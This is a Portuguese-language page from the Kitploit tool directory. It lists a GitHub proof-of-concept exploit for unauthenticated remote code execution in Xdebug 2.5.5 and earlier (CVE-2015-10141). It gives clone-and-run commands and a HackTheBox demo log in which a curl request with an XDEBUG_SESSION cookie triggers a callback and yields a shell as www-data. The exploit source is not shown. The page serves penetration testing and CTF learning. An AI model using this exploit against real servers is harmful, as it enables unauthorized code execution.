Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2015-10141-Xdebug — Script de exploração de Prova de Conceito para Xdebug 2.5.5 e versões anteriores (CVE-2015-10141). | Kitploit
Ferramentas/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

Script de exploração de Prova de Conceito para Xdebug 2.5.5 e versões anteriores (CVE-2015-10141).

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC-CVE-2015-10141

Exploit Python personalizado para Xdebug ≤ 2.5.5 (CVE-2015-10141).


Descrição

Este repositório contém meu exploit de Prova de Conceito (PoC) para a vulnerabilidade de execução remota de código do Xdebug nas versões 2.5.5 e anteriores.
O script utiliza o protocolo de depuração não autenticado exposto na porta 9000 para alcançar execução remota de comandos.

  • Vulnerabilidade: CVE-2015-10141
  • Tipo de vulnerabilidade: Execução Remota de Código (RCE)
  • Software afetado: Xdebug ≤ 2.5.5

Uso

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

Quando solicitado, insira o IP alvo onde o Xdebug está hospedado.

Demonstração do meu recente write-up do HackTheBox Olympus (Médio) :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

Requisitos

  • Python 3.x
  • Alvo executando Xdebug ≤ 2.5.5 com depuração remota ativada

Aviso Legal

Este projeto é criado apenas para fins educacionais.

NÃO use este exploit contra sistemas sem autorização explícita. Não me responsabilizo por qualquer uso indevido deste código.


Referências

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Site Oficial do Xdebug
Baixar ferramenta